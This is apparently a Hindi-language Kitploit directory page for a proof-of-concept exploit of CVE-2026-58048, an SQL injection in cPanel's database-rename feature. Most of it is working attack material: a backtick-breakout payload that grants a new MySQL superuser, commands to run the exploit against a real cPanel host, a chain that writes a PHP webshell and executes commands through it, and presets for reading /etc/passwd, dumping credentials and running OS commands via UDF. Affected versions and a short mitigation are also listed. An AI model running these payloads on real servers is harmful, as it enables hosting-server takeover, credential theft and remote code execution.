Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-CVE-2026-58048 — Security research project | Kitploit
उपकरण/GitHubGitHub/imbas007/poc-cve-2026-58048
Privilege EscalationExploitationWeb Application ExploitationWeb SecurityPenetration TestingDatabase SecurityLabs & Practice
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

Security research project

रिपॉजिटरी देखें
116 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-58048

CVSS 4.0: 9.4 (गंभीर) | CWE-89: SQL Injection | NVD

प्रमाणित cPanel उपयोगकर्ता → डेटाबेस रीनेम के माध्यम से MySQL root के रूप में मनमाना SQL। cPanel रूट के रूप में रीनेम ऑपरेशन निष्पादित करते समय उपयोगकर्ता के सत्र sql_mode (ANSI_QUOTES) को अनुचित रूप से संरक्षित रखता है — डेटाबेस नाम में एक backtick पहचानकर्ता से बाहर निकलकर SQL इंजेक्ट कर देता है।

root@kitploit:~
name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

त्वरित आरंभ (Docker लैब)

root@kitploit:~
pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

लैब मोड स्वतः पहचाना जाता है — किसी --lab फ़्लैग की आवश्यकता नहीं है।

वास्तविक cPanel लक्ष्य

root@kitploit:~
python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

पेलोड प्रीसेट

कस्टम SQL: --inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

पूर्ण RCE श्रृंखला (लैब)

root@kitploit:~
# 1. Write shell to web root
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. Execute commands via HTTP!
curl "http://localhost:18081/shell.php?0=id"

प्रभावित संस्करण

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32; WP Squared < 11.138.1.6

शमन: अपग्रेड करें, या cPanel उपयोगकर्ताओं से MySQL सुविधा रद्द कर दें।

संदर्भ

  • cPanel एडवाइज़री
  • SecurityOnline

केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए।

टूल डाउनलोड करें
प्रीसेटप्रभाव
admin-user (डिफ़ॉल्ट)MySQL admin उपयोगकर्ता rce बनाएं
compact-adminछोटा admin पेलोड (<64 अक्षर — वास्तविक cPanel की नाम सीमा में फिट बैठता है; सत्यापित करें: r/p)
webshellINTO OUTFILE के माध्यम से PHP शेल लिखें (--shell /var/www/html/shell.php)
read-fileLOAD_FILE के माध्यम से सर्वर फ़ाइल पढ़ें (--file /etc/passwd)
dump-usersसभी MySQL क्रेडेंशियल को pwn.users में डंप करें
udf-rceUDF के माध्यम से OS कमांड निष्पादन